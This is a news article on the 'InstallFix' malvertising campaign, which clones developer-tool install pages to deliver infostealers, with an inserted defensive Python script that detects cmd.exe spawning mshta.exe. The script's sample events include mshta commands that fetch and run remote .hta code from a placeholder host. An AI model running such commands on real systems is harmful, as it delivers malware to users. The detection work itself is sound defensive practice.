
Cloned AI Tool Sites Distribute Malware in ‘InstallFix’ Campaign

Threat actors replace legitimate commands on the cloned installation webpages with malicious commands.


A new variant of the ClickFix attack relies on cloned webpages for popular development tools to distribute information-stealing malware, Push Security reports.

As part of the campaign, dubbed InstallFix, threat actors rely on malvertising to lure victims to legitimate-looking malicious installation pages on which install commands have been replaced with rogue ones.

One variant of the attack abuses users’ interest in Anthropic’s Claude Code CLI tool, using malicious advertisements distributed exclusively through Google Ads, increasing the visibility of the cloned page via sponsored search results.

The cloned page is a near-pixel-perfect replica of the legitimate one. The install one-liner on it, however, points to an attacker-controlled server that distributes an infostealer, instead of fetching the install script for Claude Code.

“Unless you’re carefully reading the URL embedded in the install one-liner (and let’s be honest, almost nobody does these days), the page is indistinguishable from the real one,” Push Security notes.

Once the victim triggers the execution chain, cmd.exe spawns mshta.exe to retrieve and run code from a remote server, resulting in an Amatera Stealer infection.
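Detection logic for the execution chain described above (cmd.exe spawning mshta.exe to pull code from a remote server), written as an added example rather than anything from the Push Security report. The process-creation records are constructed, and the field names (`pid`, `ppid`, `image`, `cmdline`) are an assumed schema to be mapped onto your EDR or Sysmon event fields.

```python
import re

# Constructed sample process-creation events (not real telemetry); the field
# names are assumptions and should be mapped to your EDR or Sysmon schema.
SAMPLE_EVENTS = [
    {"pid": 3901, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 4412, "ppid": 3901, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c "mshta https://example.invalid/p.hta"'},
    {"pid": 4420, "ppid": 4412, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://example.invalid/p.hta"},
    {"pid": 5101, "ppid": 4412, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta "C:\Program Files\Vendor\setup.hta"'},
    {"pid": 5200, "ppid": 3901, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://example.invalid/other.hta"},
]

URL_RE = re.compile(r"\b(?:https?|ftp)://([\w.-]+)", re.IGNORECASE)
UNC_RE = re.compile(r"\\\\([\w.-]+)\\")


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def remote_hosts(cmdline):
    """Hostnames referenced by URL or UNC path in a command line."""
    return [h.lower() for h in URL_RE.findall(cmdline) + UNC_RE.findall(cmdline)]


def find_installfix_chains(events, parents=("cmd.exe",)):
    """Flag mshta.exe launched by cmd.exe, the chain in the InstallFix report.
    A remote location in the mshta command line is rated high; a local .hta
    launched the same way is still reported, at medium, for triage."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if _basename(e["image"]) != "mshta.exe":
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or _basename(parent["image"]) not in parents:
            continue
        hosts = remote_hosts(e["cmdline"])
        hits.append({"pid": e["pid"], "ppid": e["ppid"], "hosts": hosts,
                     "severity": "high" if hosts else "medium"})
    return hits


if __name__ == "__main__":
    for hit in find_installfix_chains(SAMPLE_EVENTS):
        print(hit)
```

The `hosts` field on each hit gives the contacted server, which is the pivot a responder would use to find other endpoints that ran the same rogue one-liner.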


“We saw different sites executing identical binaries, further indicating that these are part of a single attacker campaign,” Push Security says.

The cybersecurity firm also notes that threat actors are abusing legitimate domains such as Cloudflare Pages, Squarespace, and Tencent EdgeOne to host malicious content and blend with normal web traffic.

Threat actors were also seen hosting malicious terminal commands on public pages on claude.ai, distributing the Cuckoo infostealer via clones of the Homebrew website, hosting rogue OpenClaw installers in GitHub repositories, and distributing malware through NPM packages mimicking Claude Code.

“But this isn’t just a Claude problem — any tool or site that is likely to get clicks, and can be easily cloned, is a potential target for malvertising and impersonation,” Push Security notes.


Written By

Ionut Arghire is an international correspondent for SecurityWeek.
